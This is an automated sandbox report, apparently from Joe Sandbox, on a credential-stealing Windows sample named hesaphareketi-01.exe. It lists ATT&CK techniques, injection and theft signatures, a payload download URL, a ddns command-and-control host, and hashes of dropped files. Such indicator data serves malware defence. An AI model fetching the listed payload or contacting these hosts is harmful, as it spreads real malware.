        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeCode function: 17_3_04224D20 sqlite3_bind_text16,17_3_04224D20
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeCode function: 17_3_04224D50 sqlite3_bind_value,17_3_04224D50
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeCode function: 17_3_04224EE0 sqlite3_bind_zeroblob,17_3_04224EE0
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeCode function: 17_3_04224F70 sqlite3_bind_parameter_count,17_3_04224F70
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeCode function: 17_3_04224FF0 sqlite3_bind_parameter_name,17_3_04224FF0
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeCode function: 17_3_04223030 sqlite3_clear_bindings,_memset,17_3_04223030
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeCode function: 17_3_042250E0 sqlite3_bind_parameter_index,17_3_042250E0

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsNative API1Registry Run Keys / Startup Folder11Process Injection312Disable or Modify Tools1OS Credential Dumping1System Time Discovery11Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationEndpoint Denial of Service1
        Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsRegistry Run Keys / Startup Folder11Deobfuscate/Decode Files or Information1Input Capture11System Information Discovery17Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothEncrypted Channel11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information2Security Account ManagerSecurity Software Discovery11SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing1NTDSProcess Discovery2Distributed Component Object ModelInput Capture11Scheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptTimestomp1LSA SecretsVirtualization/Sandbox Evasion21SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol23Manipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading3Cached Domain CredentialsApplication Window Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion21DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection312Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Hidden Files and Directories1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
        Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Hidden Users1Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 502776 Sample: hesaphareketi-01.exe Startdate: 14/10/2021 Architecture: WINDOWS Score: 100 31 Found malware configuration 2->31 33 Malicious sample detected (through community Yara rule) 2->33 35 Multi AV Scanner detection for submitted file 2->35 37 7 other signatures 2->37 6 hesaphareketi-01.exe 16 7 2->6         started        process3 dnsIp4 27 store2.gofile.io 31.14.69.10, 443, 49762 LINKER-ASFR Virgin Islands (BRITISH) 6->27 19 C:\Users\user\AppData\Roaming\...\Skype.exe, PE32 6->19 dropped 21 C:\Users\user\...\hesaphareketi-01.exe, PE32 6->21 dropped 23 C:\Users\user\...\Skype.exe:Zone.Identifier, ASCII 6->23 dropped 25 2 other malicious files 6->25 dropped 39 Creates an undocumented autostart registry key 6->39 41 Writes to foreign memory regions 6->41 43 Allocates memory in foreign processes 6->43 45 Injects a PE file into a foreign processes 6->45 11 hesaphareketi-01.exe 3 4 6->11         started        15 hesaphareketi-01.exe 6->15         started        17 hesaphareketi-01.exe 6->17         started        file5 signatures6 process7 dnsIp8 29 atifgabuying.ddns.net 185.66.91.154, 49784, 7681 BRNET-ASUA Ukraine 11->29 47 Tries to steal Mail credentials (via file access) 11->47 49 Tries to harvest and steal browser information (history, passwords, etc) 11->49 51 Increases the number of concurrent connection per server for Internet Explorer 11->51 53 Hides that the sample has been downloaded from the Internet (zone.identifier) 11->53 55 Multi AV Scanner detection for dropped file 15->55 57 Machine Learning detection for dropped file 15->57 signatures9

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        hesaphareketi-01.exe31%VirustotalBrowse
        hesaphareketi-01.exe100%Joe Sandbox ML

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Skype.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe31%VirustotalBrowse

        Unpacked PE Files

        SourceDetectionScannerLabelLinkDownload
        17.2.hesaphareketi-01.exe.400000.0.unpack100%AviraTR/Redcap.ghjptDownload File

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        atifgabuying.ddns.net0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        store2.gofile.io
        		31.14.69.10
        		truefalse
          		high
          atifgabuying.ddns.net
          		185.66.91.154
          		truetrue
            		unknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            atifgabuying.ddns.nettrue
            • Avira URL Cloud: safe
            		unknown
            https://store2.gofile.io/download/a3cd5cbe-ac92-4ed8-a75c-282d6ded34cd/Gppieq.dllfalse
              		high

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://store2.gofile.iohesaphareketi-01.exe, 00000000.00000002.372341760.0000000002601000.00000004.00000001.sdmpfalse
                		high
                https://github.com/syohex/java-simple-mine-sweeperC:hesaphareketi-01.exe, 00000000.00000002.372661566.0000000003681000.00000004.00000001.sdmp, hesaphareketi-01.exe, 00000011.00000002.510453136.0000000000400000.00000040.00000001.sdmpfalse
                  		high
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namehesaphareketi-01.exe, 00000000.00000002.372341760.0000000002601000.00000004.00000001.sdmpfalse
                    		high
                    https://github.com/syohex/java-simple-mine-sweeperhesaphareketi-01.exefalse
                      		high

                      Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public

                      IPDomainCountryFlagASNASN NameMalicious
                      31.14.69.10
                      		store2.gofile.ioVirgin Islands (BRITISH)
                      		199483LINKER-ASFRfalse
                      185.66.91.154
                      		atifgabuying.ddns.netUkraine
                      		201184BRNET-ASUAtrue

                      General Information

                      Joe Sandbox Version:33.0.0 White Diamond
                      Analysis ID:502776
                      Start date:14.10.2021
                      Start time:12:19:40
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 11m 9s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Sample file name:hesaphareketi-01.exe
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:25
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.phis.troj.spyw.expl.evad.winEXE@7/7@2/2
                      EGA Information:Failed
                      HDC Information:
                      • Successful, ratio: 6.2% (good quality ratio 5.3%)
                      • Quality average: 52.9%
                      • Quality standard deviation: 29.3%
                      HCA Information:
                      • Successful, ratio: 72%
                      • Number of executed functions: 36
                      • Number of non-executed functions: 52
                      Cookbook Comments:
                      • Adjust boot time
                      • Enable AMSI
                      • Found application associated with file extension: .exe
                      Warnings:
                      Show All
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 20.49.150.241, 51.11.168.232, 131.253.33.200, 13.107.22.200, 20.82.210.154, 95.100.218.79, 95.100.216.89, 8.247.248.249, 8.247.248.223, 8.247.244.249, 93.184.220.29, 20.199.120.85, 20.50.102.62, 23.54.159.123, 2.21.98.11, 2.21.98.8, 40.112.88.60, 23.52.67.98, 23.52.67.112, 20.199.120.182
                      • Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, cs9.wac.phicdn.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, www.bing.com, client.wns.windows.com, fs.microsoft.com, wu-shim.trafficmanager.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, settings-win.data.microsoft.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, settingsfd-geo.trafficmanager.net, download.windowsupdate.com.edgesuite.net, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      12:21:38API Interceptor1x Sleep call for process: hesaphareketi-01.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      31.14.69.103SuFxdofUZ.exeGet hashmaliciousBrowse
                        oNRkAuTeL1.exeGet hashmaliciousBrowse
                          LFEs2N6DU4.exeGet hashmaliciousBrowse
                            6J3qzZz5pS.exeGet hashmaliciousBrowse
                              WU PAYMENT DETAILS.docGet hashmaliciousBrowse
                                Qoutation013-10.exeGet hashmaliciousBrowse
                                  Gkd7ep9tKS.exeGet hashmaliciousBrowse
                                    hKzrJKI9CR.exeGet hashmaliciousBrowse
                                      Request For New Qoute - Ist Order.exeGet hashmaliciousBrowse
                                        Invoice- 0535254 Oil_Field_4568742.docGet hashmaliciousBrowse
                                          MT103-Advance.Payment.exeGet hashmaliciousBrowse
                                            Payment009731743,pdf.exeGet hashmaliciousBrowse
                                              IMG-XEROX.exeGet hashmaliciousBrowse
                                                office.exeGet hashmaliciousBrowse
                                                  PCS TENDER PROFILE-20210920.exeGet hashmaliciousBrowse
                                                    New Order Inquiry No.96883,pdf.exeGet hashmaliciousBrowse
                                                      PCS TENDER PROFILE-20210920.exeGet hashmaliciousBrowse
                                                        TxEjwXD8eb.exeGet hashmaliciousBrowse
                                                          DHL-3009216769976535455627775648896.exeGet hashmaliciousBrowse
                                                            gFPbTs1YDm.exeGet hashmaliciousBrowse
                                                              185.66.91.154PCS TENDER PROFILE-20210920.exeGet hashmaliciousBrowse
                                                                PCS TENDER PROFILE-20210920.exeGet hashmaliciousBrowse

                                                                  Domains

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  store2.gofile.io3SuFxdofUZ.exeGet hashmaliciousBrowse
                                                                  • 31.14.69.10
                                                                  oNRkAuTeL1.exeGet hashmaliciousBrowse
                                                                  • 31.14.69.10
                                                                  LFEs2N6DU4.exeGet hashmaliciousBrowse
                                                                  • 31.14.69.10
                                                                  6J3qzZz5pS.exeGet hashmaliciousBrowse
                                                                  • 31.14.69.10
                                                                  WU PAYMENT DETAILS.docGet hashmaliciousBrowse
                                                                  • 31.14.69.10
                                                                  Qoutation013-10.exeGet hashmaliciousBrowse
                                                                  • 31.14.69.10
                                                                  Gkd7ep9tKS.exeGet hashmaliciousBrowse
                                                                  • 31.14.69.10
                                                                  hKzrJKI9CR.exeGet hashmaliciousBrowse
                                                                  • 31.14.69.10
                                                                  Request For New Qoute - Ist Order.exeGet hashmaliciousBrowse
                                                                  • 31.14.69.10
                                                                  Invoice- 0535254 Oil_Field_4568742.docGet hashmaliciousBrowse
                                                                  • 31.14.69.10
                                                                  MT103-Advance.Payment.exeGet hashmaliciousBrowse
                                                                  • 31.14.69.10
                                                                  Payment009731743,pdf.exeGet hashmaliciousBrowse
                                                                  • 31.14.69.10
                                                                  IMG-XEROX.exeGet hashmaliciousBrowse
                                                                  • 31.14.69.10
                                                                  office.exeGet hashmaliciousBrowse
                                                                  • 31.14.69.10
                                                                  PCS TENDER PROFILE-20210920.exeGet hashmaliciousBrowse
                                                                  • 31.14.69.10
                                                                  New Order Inquiry No.96883,pdf.exeGet hashmaliciousBrowse
                                                                  • 31.14.69.10
                                                                  PCS TENDER PROFILE-20210920.exeGet hashmaliciousBrowse
                                                                  • 31.14.69.10
                                                                  TxEjwXD8eb.exeGet hashmaliciousBrowse
                                                                  • 31.14.69.10
                                                                  DHL-3009216769976535455627775648896.exeGet hashmaliciousBrowse
                                                                  • 31.14.69.10
                                                                  gFPbTs1YDm.exeGet hashmaliciousBrowse
                                                                  • 31.14.69.10

                                                                  ASN

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  LINKER-ASFR3SuFxdofUZ.exeGet hashmaliciousBrowse
                                                                  • 31.14.69.10
                                                                  oNRkAuTeL1.exeGet hashmaliciousBrowse
                                                                  • 31.14.69.10
                                                                  LFEs2N6DU4.exeGet hashmaliciousBrowse
                                                                  • 31.14.69.10
                                                                  6J3qzZz5pS.exeGet hashmaliciousBrowse
                                                                  • 31.14.69.10
                                                                  WU PAYMENT DETAILS.docGet hashmaliciousBrowse
                                                                  • 31.14.69.10
                                                                  Qoutation013-10.exeGet hashmaliciousBrowse
                                                                  • 31.14.69.10
                                                                  Gkd7ep9tKS.exeGet hashmaliciousBrowse
                                                                  • 31.14.69.10
                                                                  hKzrJKI9CR.exeGet hashmaliciousBrowse
                                                                  • 31.14.69.10
                                                                  Request For New Qoute - Ist Order.exeGet hashmaliciousBrowse
                                                                  • 31.14.69.10
                                                                  Invoice- 0535254 Oil_Field_4568742.docGet hashmaliciousBrowse
                                                                  • 31.14.69.10
                                                                  MT103-Advance.Payment.exeGet hashmaliciousBrowse
                                                                  • 31.14.69.10
                                                                  Payment009731743,pdf.exeGet hashmaliciousBrowse
                                                                  • 31.14.69.10
                                                                  IMG-XEROX.exeGet hashmaliciousBrowse
                                                                  • 31.14.69.10
                                                                  office.exeGet hashmaliciousBrowse
                                                                  • 31.14.69.10
                                                                  PCS TENDER PROFILE-20210920.exeGet hashmaliciousBrowse
                                                                  • 31.14.69.10
                                                                  New Order Inquiry No.96883,pdf.exeGet hashmaliciousBrowse
                                                                  • 31.14.69.10
                                                                  PCS TENDER PROFILE-20210920.exeGet hashmaliciousBrowse
                                                                  • 31.14.69.10
                                                                  TxEjwXD8eb.exeGet hashmaliciousBrowse
                                                                  • 31.14.69.10
                                                                  DHL-3009216769976535455627775648896.exeGet hashmaliciousBrowse
                                                                  • 31.14.69.10
                                                                  gFPbTs1YDm.exeGet hashmaliciousBrowse
                                                                  • 31.14.69.10
                                                                  BRNET-ASUAPCS TENDER PROFILE-20210920.exeGet hashmaliciousBrowse
                                                                  • 185.66.91.154
                                                                  PCS TENDER PROFILE-20210920.exeGet hashmaliciousBrowse
                                                                  • 185.66.91.154

                                                                  JA3 Fingerprints

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  3b5074b1b5d032e5620f69f9f700ff0emasa_prot.exeGet hashmaliciousBrowse
                                                                  • 31.14.69.10
                                                                  hQQe6WqUOP.exeGet hashmaliciousBrowse
                                                                  • 31.14.69.10
                                                                  3SuFxdofUZ.exeGet hashmaliciousBrowse
                                                                  • 31.14.69.10
                                                                  75lT7DuXrs.exeGet hashmaliciousBrowse
                                                                  • 31.14.69.10
                                                                  oIKRh1ruPM.exeGet hashmaliciousBrowse
                                                                  • 31.14.69.10
                                                                  oNRkAuTeL1.exeGet hashmaliciousBrowse
                                                                  • 31.14.69.10
                                                                  LFEs2N6DU4.exeGet hashmaliciousBrowse
                                                                  • 31.14.69.10
                                                                  M12s7KNFDg.exeGet hashmaliciousBrowse
                                                                  • 31.14.69.10
                                                                  SecuriteInfo.com.Suspicious.Win32.Save.a.2604.exeGet hashmaliciousBrowse
                                                                  • 31.14.69.10
                                                                  farcry6_repack.exeGet hashmaliciousBrowse
                                                                  • 31.14.69.10
                                                                  7ofFMoirr5.exeGet hashmaliciousBrowse
                                                                  • 31.14.69.10
                                                                  BF2042.exeGet hashmaliciousBrowse
                                                                  • 31.14.69.10
                                                                  6J3qzZz5pS.exeGet hashmaliciousBrowse
                                                                  • 31.14.69.10
                                                                  SecuriteInfo.com.W32.AIDetect.malware1.10225.exeGet hashmaliciousBrowse
                                                                  • 31.14.69.10
                                                                  WU PAYMENT DETAILS.docGet hashmaliciousBrowse
                                                                  • 31.14.69.10
                                                                  Qoutation013-10.exeGet hashmaliciousBrowse
                                                                  • 31.14.69.10
                                                                  invoice.exeGet hashmaliciousBrowse
                                                                  • 31.14.69.10
                                                                  Gkd7ep9tKS.exeGet hashmaliciousBrowse
                                                                  • 31.14.69.10
                                                                  hKzrJKI9CR.exeGet hashmaliciousBrowse
                                                                  • 31.14.69.10
                                                                  Request For New Qoute - Ist Order.exeGet hashmaliciousBrowse
                                                                  • 31.14.69.10

                                                                  Dropped Files

                                                                  No context

                                                                  Created / dropped Files

                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\hesaphareketi-01.exe.log
                                                                  Process:C:\Users\user\Desktop\hesaphareketi-01.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:modified
                                                                  Size (bytes):847
                                                                  Entropy (8bit):5.35816127824051
                                                                  Encrypted:false
                                                                  SSDEEP:24:ML9E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7a:MxHKXwYHKhQnoPtHoxHhAHKzva
                                                                  MD5:31E089E21A2AEB18A2A23D3E61EB2167
                                                                  SHA1:E873A8FC023D1C6D767A0C752582E3C9FD67A8B0
                                                                  SHA-256:2DCCE5D76F242AF36DB3D670C006468BEEA4C58A6814B2684FE44D45E7A3F836
                                                                  SHA-512:A0DB65C3E133856C0A73990AEC30B1B037EA486B44E4A30657DD5775880FB9248D9E1CB533420299D0538882E9A883BA64F30F7263EB0DD62D1C673E7DBA881D
                                                                  Malicious:true
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..
                                                                  C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe
                                                                  Process:C:\Users\user\Desktop\hesaphareketi-01.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33792
                                                                  Entropy (8bit):4.917728901780082
                                                                  Encrypted:false
                                                                  SSDEEP:384:J5lchOF7FykxU3HNKiK7GsUeYDEBTGvX1Lokc3OwRM+6ew/QxXZR45XHgNd:XScdFjiIIlLzceQRxpS5wNd
                                                                  MD5:38E162610466DD251D9B377A60F65C11
                                                                  SHA1:2A597D5198230EAAFE8D842E76776192BA3E6742
                                                                  SHA-256:7EB784EDDDDE0EDDD7B21C4907916F0109334A4237A9C2EB917CAF8EAE81480F
                                                                  SHA-512:385A3A4D1592539E64A14A096AB50F86925376CCA6CD23DCE1F88CF636AFFCE84CD16C8716B68889BC10CB514822ADC26BC2AEC4CD6B6200FBBEE611740994BC
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: Virustotal, Detection: 31%, Browse
                                                                  Reputation:low
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..6...L.......U... ...`....@.. ....................................@.................................pU..K....`...H........................................................................... ............... ..H............text....5... ...6.................. ..`.rsrc....H...`...J...8..............@..@.reloc..............................@..B.................U......H.......|1..4#...........T...............................................r...p(......:....(....*(....r...p(....*.0..........8|.......E........8......o....8......(....8..... ....(....8.....q...&8.....f...8a.....o.... ....~)...:....&8......(....(....8....s......8......(....#......3@?....8......o......8....*8....8......o......8............0..D.......0.......... ........8........E........~...8.......(....9P...80.....(....&8>...*...8....8....8a........i?V...8......o....r...p(....9
                                                                  C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe:Zone.Identifier
                                                                  Process:C:\Users\user\Desktop\hesaphareketi-01.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):26
                                                                  Entropy (8bit):3.95006375643621
                                                                  Encrypted:false
                                                                  SSDEEP:3:ggPYV:rPYV
                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                  Malicious:true
                                                                  Reputation:high, very likely benign file
                                                                  Preview: [ZoneTransfer]....ZoneId=0
                                                                  C:\Users\user\AppData\Roaming\.BjejAh.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe
                                                                  File Type:ASCII text, with very long lines, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):349054
                                                                  Entropy (8bit):6.015923338738634
                                                                  Encrypted:false
                                                                  SSDEEP:6144:LaqfIlUOoSiuRZ8Acx6ZaurE5/EDnJpAl9SeefNqWF4iVx/9LPeq/1LHm/dB0:8o5xzurRDn9nfNxF4ijZVtilB0
                                                                  MD5:8F78FB2B979EA740DEBFFA2E7C0C8BC1
                                                                  SHA1:CB25EF1BE9D2FA7F887CEF502AFEF53124CC6611
                                                                  SHA-256:67B3629D611456470A840311D6A9DE0D0DF5BF39231C6391FFEECF97DB11CE11
                                                                  SHA-512:924B1B4D676B58F7780A37211C1C44BCDC68BEF2C0A86E701F09EBD761EDEE03355BAAB1B70D98B2F9FD17010FA8DF495F29CFDE3971CF0922B32ABFCBC40CF5
                                                                  Malicious:false
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.601476985175213e+12,"network":1.601452328e+12,"ticks":615129919.0,"uncertainty":4535485.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABUPWY4cSyAQZRX3j8/SLmMAAAAAAIAAAAAABBmAAAAAQAAIAAAACC7lwCjByxIY/Ds1S6cdCxJW6iSr1QfjoKlVKoVEQ4EAAAAAA6AAAAAAgAAIAAAAD9PMfiGkWkdrfU+zeMpOLPS1eDxLpcgjYP2R/ndeCNxMAAAAK+RpovfP61NtB5nOpQgPMjPTyt2T1WPeru9i3yP05zNVEj0uCRDWfONruG9ricX1kAAAADB9KtQ9KY2z38GdfaF7dW2ZLcAMHOX2oEKBg8ZJG9lsuMexxChB4M8HFpyb0Bpr6axpi+zmMIXt76noTOxFzKN"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245950075265799"},"policy":{"last_statistics_update":"13245950583241
                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Skype.exe
                                                                  Process:C:\Users\user\Desktop\hesaphareketi-01.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33792
                                                                  Entropy (8bit):4.917728901780082
                                                                  Encrypted:false
                                                                  SSDEEP:384:J5lchOF7FykxU3HNKiK7GsUeYDEBTGvX1Lokc3OwRM+6ew/QxXZR45XHgNd:XScdFjiIIlLzceQRxpS5wNd
                                                                  MD5:38E162610466DD251D9B377A60F65C11
                                                                  SHA1:2A597D5198230EAAFE8D842E76776192BA3E6742
                                                                  SHA-256:7EB784EDDDDE0EDDD7B21C4907916F0109334A4237A9C2EB917CAF8EAE81480F
                                                                  SHA-512:385A3A4D1592539E64A14A096AB50F86925376CCA6CD23DCE1F88CF636AFFCE84CD16C8716B68889BC10CB514822ADC26BC2AEC4CD6B6200FBBEE611740994BC
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  Reputation:low
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..6...L.......U... ...`....@.. ....................................@.................................pU..K....`...H........................................................................... ............... ..H............text....5... ...6.................. ..`.rsrc....H...`...J...8..............@..@.reloc..............................@..B.................U......H.......|1..4#...........T...............................................r...p(......:....(....*(....r...p(....*.0..........8|.......E........8......o....8......(....8..... ....(....8.....q...&8.....f...8a.....o.... ....~)...:....&8......(....(....8....s......8......(....#......3@?....8......o......8....*8....8......o......8............0..D.......0.......... ........8........E........~...8.......(....9P...80.....(....&8>...*...8....8....8a........i?V...8......o....r...p(....9
                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Skype.exe:Zone.Identifier
                                                                  Process:C:\Users\user\Desktop\hesaphareketi-01.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):26
                                                                  Entropy (8bit):3.95006375643621
                                                                  Encrypted:false
                                                                  SSDEEP:3:ggPYV:rPYV
                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                  Malicious:true
                                                                  Reputation:high, very likely benign file
                                                                  Preview: [ZoneTransfer]....ZoneId=0
                                                                  C:\Users\user\AppData\Roaming\tF.a..z.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                  Category:dropped
                                                                  Size (bytes):40960
                                                                  Entropy (8bit):0.792852251086831
